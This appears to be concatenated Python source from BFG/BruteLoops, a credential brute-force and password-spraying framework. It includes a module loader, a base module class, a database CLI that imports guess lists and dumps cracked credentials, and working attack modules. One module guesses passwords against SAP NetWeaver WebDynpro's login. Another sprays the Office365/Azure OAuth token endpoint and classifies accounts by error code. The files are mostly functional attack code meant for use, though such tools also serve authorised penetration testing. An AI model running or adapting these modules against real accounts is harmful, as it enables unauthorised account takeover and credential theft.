from bruteloops.args import *
from pathlib import Path
from importlib.util import spec_from_file_location, module_from_spec
from importlib import import_module
import inspect

# Get the base modules directory
base=Path(Path(inspect.getfile(inspect.currentframe())).parent \
        .absolute().__str__()+'/modules')

# Enumerate each valid module file to import
files = sorted([
    f for f in base.glob('**/*.py')
    if f.is_file() and not f.name.startswith('_')
])

# Initialize an argument parser object
parser = argparse.ArgumentParser(
        description='Example program that makes use of BruteLoops. ' \
                'Select a brute force module and input database to ' \
                'perform a highly configurable brute force attack a'
                'gainst a target service.',
        parents=[gp,jp,op],
        add_help=False)

# Initialize the subparsers object
subparsers = parser.add_subparsers(title='Brute Force Modules',
        help='Brute Modules Help',
        description='Select a brute force module below. Pass the ' \
                '--help flag to the module to get help related to' \
                ' module-level parameters.')

# Add each module as a subcommand
for f in files:

    # Create the name for the module and subcommand
    name = '.'.join(str(f.absolute()).split('/')[-3:]).strip('.py')

    # Import the module
    module = import_module('bfg.modules.'+name)

    # Validate the module and build the interface components
    module.Module.validate()
    module.Module.build_interface(subparsers)




#!/usr/bin/env python3
import warnings
warnings.filterwarnings('ignore')
import re
import requests
import logging
from logging import getLogger, INFO
from bfg.args import http as http_args
from bfg.shortcuts.http import HTTPModule, handleUA

# Get the brute force logger
log = getLogger('BruteLoops.example.modules.http.sap_webdynpro')
getLogger('urllib3.connectionpool').setLevel(INFO)

UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (' \
    'KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'

BASE_PATH = '/webdynpro/dispatcher/sap.com/tc~wd~tools'

def url():

    return http_args.url(help='Base URL, e.g. '
        'https://sap.samedomain.com. Standard paths will be suffixed.')

class Module(HTTPModule):

    name = 'http.sap_webdynpro'
    description = brief_description = 'SAP Netweaver Webdynpro, ver. ' \
        '7.3007.20120613105137.0000'
    args = [url()] + http_args.getDefaults('url', invert=True)
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __init__(self, url, *args, **kwargs):

        url = url+BASE_PATH
        super().__init__(url=url, *args, **kwargs)

    @handleUA
    def __call__(self,username,password,*args,**kwargs):


        # Construct a session
        session = requests.Session(headers=self.headers)

        # ========================
        # GET COOKIES & CSRF TOKEN
        # ========================

        # Get cookies
        resp = session.get(self.url+'/WebDynproConsole',
                verify=self.verify_ssl,
                proxies=self.proxies)

        # Find the j_salt value from the response body
        match = re.search('name="j_salt" value="(.*?)"', resp.text)

        if not match:
            raise Exception('Failed to extract j_salt CSRF token')

        # =====================
        # GUESS THE CREDENTIALS
        # =====================
    
        # make the request
        resp = session.post(self.url+'/j_security_check',
                data={
                        'j_salt':match.groups()[0],
                        'j_username':username,
                        'j_password':password
                    },
                verify=self.verify_ssl,
                allow_redirects=False,
                proxies=self.proxies)

        if re.search('Logon with password not allowed', resp.text):
            log.log(60, f'Logon with password not allowed: {username}')
    
        # verify credentials and return outcome
        if resp.status_code == 200 and \
                re.search('authentication failed', resp.text, re.I):
            return [0, username, password]
        else:
            return [1, username, password]



import argparse
import inspect
import re
        
class Module:

    '''# Base Module Class

    This class serves as a template for brute force modules within this
    example directory. It builds the interface subcommands by
    inspecting the __init__ method while also enforcing restrictions on
    the __call__ method to ensure BruteLoops can make authentication
    callbacks.

    # The __init__ Method

    This method can be used to set static values supporting a brute
    force module. It's useful in situations when an upstream server
    needs to be targeted.

    # The __call__ Method

    This method is called for each authentication attempt by BruteLoops
    and should check the validity of a username and password. The method
    signature must look like:

    ```
    def __call__(self, username, password, *args, **kwargs):
        success = False

        # Do authentication and update success to True if successful

        if success: return dict(outcome=1,username=username,password=password)
        else: return dict(outcome=0,username=username,password=password,
    ```

    Note the structure returned in the declaration above. The leading
    integer value determines if authentication was successful, indicating
    valid credentials: 1 means success, 0 means failure.
    '''

    # Name for the module that'll be shown in logging
    name = None

    # Brief description to display in the help menu
    brief_description = None

    # Description of the module that'll be shown in the interface
    description = None

    @classmethod
    def initialize(cls, args):
        '''Initialize and return the underlying brute force module.
        '''

        # Translate the argparse arguments to a dictionary
        args = vars(args)

        # Initialize a dictionary to hold all of the necessary argument
        # to initialize the brute force module.
        dct = {}

        # Take each argparse value and add it to the dictionary
        for k,v in inspect.signature(cls.__init__).parameters.items():

            # Skip "self" references
            if k == 'self': continue

            # Extract the user supplied value when provided
            if k in args: dct[k]=args[k]

            # Use the default value other wise
            else: dct[k]=v

        # Initialize and return the module
        return cls(**dct)

    @classmethod
    def validate(cls):

        # ==============================
        # VALIDATING THE __call__ METHOD
        # ==============================

        # Ensure that it's declared
        assert getattr(cls,'__call__'),('Modules must be callable. '
             'Declare a __call__ method on the module: ' \
             f'{cls.get_handle}')

        # Get a list of parameter names
        call_params = list(inspect.signature(cls.__call__).parameters \
                .keys())

        if call_params and call_params[0] == 'self':
            call_params = call_params[1:3]

        # Ensure there are two or greater params to be received
        assert len(call_params) == 2,('__call__ must receive at ' \
              'least two arguments: username, password')

        # Ensure that the first two are 'username' and 'password'
        assert ['username','password'] == call_params,('__call__ ' \
            'must receive the first two arguments as username, ' \
            f'password -- not: {call_params}')

    @classmethod
    def get_handle(cls):
        '''Return a simple string to use as a module identifier.
        '''
        return '.'.join(cls.__module__.split('.')[-3:][:2])

    @classmethod
    def build_interface(cls,
            subparsers: 'Argparse subparsers that will receive the subcommand') \
                    -> argparse.ArgumentParser:
        '''Use the inspect module to iterate over each parameter
        declared in __init__ and build an interface via argparse.
        '''

        # =====================
        # INITIALIZE THE PARSER
        # =====================
        '''Here we create a new argparse argument parser for the command
        assoicated with the newly created module. This is how we bind
        the name that the user will refernce at the commandline, along
        with providing a mechanism to assign values to module parameters.
        '''

        epilog = None
        if hasattr(cls, 'contributors'):
            epilog = 'Module Contributors:\n\n'

            if not isinstance(cls.contributors, list):

                raise ValueError(
                    'Module contributors must be a list of dictionary '
                    f'values, not {type(cls.contributors)}')

            for cont in cls.contributors:

                if not isinstance(cont, dict):

                    raise ValueError(
                        'contributor records must be dictionaries, '
                        f'not {type(cont)}')

                name = cont.get('name')
                additional = cont.get('additional')

                if not name:

                    raise ValueError(
                        'contributor records must have a "name" field')

                epilog += f'- {name}'

                if additional:

                    if not isinstance(additional, dict):

                        raise ValueError(
                            'additional field of contributor records '
                            f'must be a dict, not {type(additional)}')

                    for k,v in additional.items():

                        epilog += f'\n  {k}: {v}'

        parser = subparsers.add_parser(cls.get_handle(),
                description=cls.description,
                help=cls.brief_description,
                parents=cls.args,
                formatter_class=argparse.RawDescriptionHelpFormatter,
                epilog=epilog)

        parser.set_defaults(module=cls)

        parser.add_argument('--database', '-db',
            required=True,
            help='Database to target.')

        return parser



import inspect
from functools import wraps
from argparse import (
    Action,
    BooleanOptionalAction,
    ArgumentParser as AP,
    _HelpAction as HA
)

def genParentArg(*args, **kwargs) -> AP:
    '''This function effectively creates a reusable argument object.

    It creates an ArgParse argument using the supplied arguments and
    bind it to an ArgumentParser object with add_help=False.
    '''

    if kwargs.get('action') == 'BoolAction':
        kwargs['action'] = BooleanOptionalAction

    parser = AP(add_help=False)
    parser.add_argument(*args, **kwargs)

    return parser

# =================
# GENERIC ARGUMENTS
# =================

def argument(f):

    @wraps(f)
    def wrapper(name_or_flags=None, **kwargs):

        if name_or_flags:
            kwargs['name_or_flags'] = name_or_flags

        spec = inspect.getfullargspec(f)
        defaults = {
            spec.args[ind]:spec.defaults[ind]
            for ind in range(0,len(spec.args))}

        defaults = defaults | kwargs

        return genParentArg(*defaults.get('name_or_flags'), **{
                k:v for k,v in defaults.items()
                if not k.startswith('__') and
                k != 'name_or_flags'})

    return wrapper

def getArgDefaults(f):

    @wraps(f)
    def wrapper(*names, invert=False):

        # Get the dictionary of default arguments
        dct = f()
    
        if not names:

            return list(dct.values())

        else:

            if invert:
                _names = [f for f in dct.keys() if not f in names]
                names = _names
                del(_names)

            values = []

            for flag in names:

                v = dct.get(flag)

                if not v:
                    raise ValueError(
                        f'Invalid argument flag requested: {flag}')

                values.append(v)

            return values

    return wrapper



from bruteloops import args as blargs
from logging import getLogger
import argparse

logger = getLogger('bfg.db_cmd')

def dump_valid(args, logger, manager):
    '''Write valid credentials to stdout
    '''

    logger.info('Dumping valid credentials')

    credentials = manager.get_valid_credentials() or []

    if len(credentials) == 0:
        logger.info('No valid credentials in database')
        return
    else:
        logger.info(f'Count of valid credentials: {len(credentials)}')

    for r in manager.get_valid_credentials():
        print(f'{r.username.value}:{r.password.value}')

    logger.info('Credentials dumped')

def dump_strict_credentials(args, logger, manager):
    '''Dump strict credentials from the database to stdout
    '''

    logger.info('Dumping static credentials')
    credentials = manager.get_strict_credentials(args.credential_delimiter)

    if len(credentials) == 0:
        logger.info('No static credentials in database')
        return
    else:
        logger.info(f'Count of static credentials: {len(credentials)}')

    for r in credentials:
        print(f'{r.username.value}{args.credential_delimiter}' \
              f'{r.password}')

    logger.info('Strict credentials dumped')


def handle_values(args, logger, manager):
    '''Insert or delete values from the database.
    '''

    new_args = {'as_credentials':args.as_credentials,
            'insert':args.action == 'insert'}

    for handle in ['usernames','passwords','credentials',
            'username_files','password_files','credential_files',
            'csv_files']:
        if hasattr(args,handle): new_args[handle] = getattr(args,handle) 

    manager.manage_db_values(**new_args)

def prioritize_values(args, logger, manager):
    '''Prioritize or unprioritize values
    '''

    new_args = {'prioritize':args.prioritize}

    for handle in ['usernames','passwords']:
        if hasattr(args,handle): new_args[handle] = getattr(args,handle)

    manager.manage_priorities(**new_args)

def disable_usernames(args, logger, manager):

    logger.info(f'Disabling usernames: {args.usernames}')
    manager.disable_username_records(container=args.usernames)

def enable_usernames(args, logger, manager):

    logger.info(f'Enabling usernames: {args.usernames}')
    manager.enable_username_records(container=args.usernames)

db_flag = argparse.ArgumentParser()
db_flag.add_argument('--database', '-db', help='Database to target.',
    required=True)

# Default parser
parser = argparse.ArgumentParser(
        description='Manage BruteLoops input databases',
        add_help=False)

parser.set_defaults(cmd=handle_values,action=None)
subparsers = parser.add_subparsers(
        title='Database Management',
        description='Manage the attack database.',
        help='Subcommands:')

# =================================
# DUMP VALID CREDENTIALS SUBCOMMAND
# =================================

parser_dump_valid = subparsers.add_parser('dump-valid',
        description='Dump valid credentials from the database',
        help='Dump valid credentials from the database',
        parents=[db_flag],
        add_help=False)
parser_dump_valid.set_defaults(cmd=dump_valid)

# ==================================
# DUMP STRICT CREDENTIALS SUBCOMMAND
# ==================================

parser_dump_strict_credentials = subparsers.add_parser(
        'dump-credential-values',
        description='Dump scrict credentials, regardless of ' \
                'of status from the database. This is a mean' \
                's of identifying which static values have b' \
                'een imported and can be used to obtain a li' \
                'st of values to be deleted from the attack.' \
                ' Use the dump_valid subcommand to dump vali' \
                'values, including strict records, from the ' \
                'database.',
        help='Dump all credential values from the database.',
        parents=[db_flag],
        add_help=False)
parser_dump_strict_credentials.add_argument(
        '--credential-delimiter',
        default=':',
        help='Character delimiting the username to password valu' \
             'e. Default: ":"')
parser_dump_strict_credentials.set_defaults(
        cmd=dump_strict_credentials)

# ========================
# IMPORT VALUES SUBCOMMAND
# ========================

parser_import_values = subparsers.add_parser('import-spray-values',
            description='Import username and password values ' \
                    'into the target database. NOTE: if crede' \
                    'ntial inputs are provided, they will be ' \
                    'split into individual username and passw' \
                    'ord values and imported for spraying. Us' \
                    'the import-credentials subommand if you ' \
                    'wish to import individual credentials th' \
                    'at will be paired individualy in the dat' \
                    'base.',
            help='Import values into the target database',
            parents=[db_flag, blargs.input_parser,blargs.credential_parser],
            add_help=False)
parser_import_values.set_defaults(as_credentials=False, action='insert')

# =============================
# IMPORT CREDENTIALS SUBCOMMAND
# =============================
# TODO: TEST ME

parser_import_credentials = subparsers.add_parser(
        'import-credential-values',
        description='Import credential values into the target' \
                ' database. The username to password relations' \
                'hip is maintained in the data meaning t' \
                'hat individual guesses for the username to p' \
                'assword combination will be scheduled. No ad' \
                'ditional guesses will be made for the userna' \
                'me and the password will not be used for gue' \
                'sses targeting other usernames.',
        help='Import credential pairs into the target database',
        parents=[db_flag, blargs.credential_parser],
        add_help=False)
parser_import_credentials.set_defaults(as_credentials=True,
        action='insert')

# ========================
# DELETE VALUES SUBCOMMAND
# ========================
# TODO: TEST ME; PAY ATTENTION TO CASCADING DELETIONS

parser_delete_values = subparsers.add_parser('delete-spray-values',
            description='Delete username and password values ' \
                    'from the target database. NOTE: if crede' \
                    'ntials are supplied, then the username a' \
                    'nd password values are removed from the ' \
                    'database entirely. Use the delete-creden' \
                    'tials subcommand if you wish to delete c' \
                    'redential records',
            help='Delete values from the target database',
            parents=[db_flag,blargs.input_parser,blargs.credential_parser],
            add_help=False)
parser_delete_values.set_defaults(as_credentials=False, action='delete')

# =============================
# DELETE CREDENTIALS SUBCOMMAND
# =============================
# TODO: TEST ME

parser_delete_credentials = subparsers.add_parser(
        'delete-credential-values',
        description='Delete credential values from the target' \
                'database. This targets password to username ' \
                'relationships, but a given username or passw' \
                'will be removed from the database entirely s' \
                'hould either no longer be associated with fu' \
                'ture guesses after the associations have bee' \
                'n removed',
        help='Delete credential pairs from the target database',
        parents=[db_flag, blargs.credential_parser],
        add_help=False)
parser_delete_credentials.set_defaults(as_credentials=True,
        action='delete')

# ============================
# PRIORITIZE VALUES SUBCOMMAND
# ============================

parser_prioritize_values = subparsers.add_parser(
        'prioritize-values',
        description='Prioritize username/password values',
        help='Prioritize username/password values',
        parents=[db_flag, blargs.stp],
        add_help=False)
parser_prioritize_values.set_defaults(
        cmd=prioritize_values)

# ==================================
# DISABLE USERNAME VALUES SUBCOMMAND
# ==================================

parser_disable_usernames = subparsers.add_parser(
    'disable-usernames',
    description='Disable usernames, removing them from further'
        'guesses.',
    help='Stop guessing of target usernames.',
    parents=[db_flag],
    add_help=False)
parser_disable_usernames.set_defaults(cmd=disable_usernames)

parser_disable_usernames.add_argument('--usernames', '-u',
    help='Usernames to disable.',
    required=True,
    nargs='+')

# =================================
# ENABLE USERNAME VALUES SUBCOMMAND
# =================================

parser_enable_usernames = subparsers.add_parser(
    'enable-usernames',
    description='Enable usernames, allowing them to be targeted'
        'guesses.',
    help='Resume guessing of target usernames.',
    parents=[db_flag],
    add_help=False)
parser_enable_usernames.set_defaults(cmd=enable_usernames)

parser_enable_usernames.add_argument('--usernames', '-u',
    help='Usernames to enable.',
    required=True,
    nargs='+')





import re
import inspect
from bfg.data import loadAzureSSOSoap
from bfg.args import http as http_args
from requests import Session
from bfg.shortcuts.http import HTTPModule, handleUA
from bfg.shortcuts.azure_errors import *
from requests.exceptions import ConnectionError

MSONLINE_URL    = 'https://login.microsoftonline.com'
MSONLINE_NETLOC = 'login.microsoftonline.com'
O365_URL        = 'https://outlook.office365.com'
AUTH_PATH       = '/common/oauth2/token'

def strip_slash(s):

    if s and s[-1] == '/':
        s=s[:len(s)-1]

    return s

class Session(Session):

    def __init__(self, url, headers=None, allow_redirects=True,
            verify_ssl=False, *args, **kwargs):

        super().__init__(*args, **kwargs)

        # Configure redirects
        self.allow_redirects=allow_redirects

        # using the setattr builtin here because requests.Session
        # doesn't care for new instance variables beinga assigned
        setattr(self,'verify_ssl',verify_ssl)

        # Update MSOL URL
        self.url = strip_slash(url)

        # Update headers
        headers = headers if headers else {}
        headers['Accept']='application/json'
        self.headers.update(headers)

    def authenticate(self,username,password):
        '''Authenticate the credentials via the Graph API.
        '''

        credential = f'{username}:{password}'

        # Create the POST data
        data = {'resource':'https://graph.windows.net',
            'client_id':'1b730954-1685-4b74-9bfd-dac224a7b894',
            'client_info':'1',
            'grant_type':'password',
            'username':username,
            'password':password,
            'scope':'openid'}

        # Make the post request
        resp = self.post(self.url+AUTH_PATH,
                data=data,
                allow_redirects=self.allow_redirects,
                verify=self.verify_ssl)

        # Search the response for error codes
        error_code = re.search(ERROR_CODE_RE, resp.text)
        if error_code:

            error_code = error_code.groups()[0]
            outcome, username_valid, events = \
                lookupCode(resp.status_code, error_code)

            if events:
                events[0] += f' - {credential}'

            return outcome, username_valid, events

        else:

            if resp.status_code == 200:
                return 1, True, ['200 OK response']
            else:
                return -1, True, ['Unhandled response event occurred']

def url():

    return http_args.url(
        name_or_flags=('--url',),
        required=False,
        default=MSONLINE_URL,
        help='Microsoft Online URL to target. Default: %(default)s')

class Module(HTTPModule):

    name = 'http.o365_graph'

    brief_description = 'Office365 Graph API'

    description = 'Brute force the Office365 Graph API.'

    args = [url()]+http_args.getDefaults('url', invert=True)

    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    references = []

    @handleUA 
    def __call__(self, username, password, *args, **kwargs):
        '''Proxy the call request up to the Session object to perform
        authentication.
        '''

        session = Session(url=self.url,
                headers=self.headers,
                verify_ssl=self.verify_ssl,
                allow_redirects=self.allow_redirects)

        if self.proxies:
            session.proxies.update(self.proxies)

        try:

            outcome, valid_account, events = \
                session.authenticate(username, password)

        except ConnectionError:

            return dict(
                outcome=-1,
                username=username,
                password=password,
                events=['Connection timed out'])

        events = events if events else []

        return dict(outcome=outcome,
                username=username,
                password=password,
                actionable=valid_account,
                events=events)




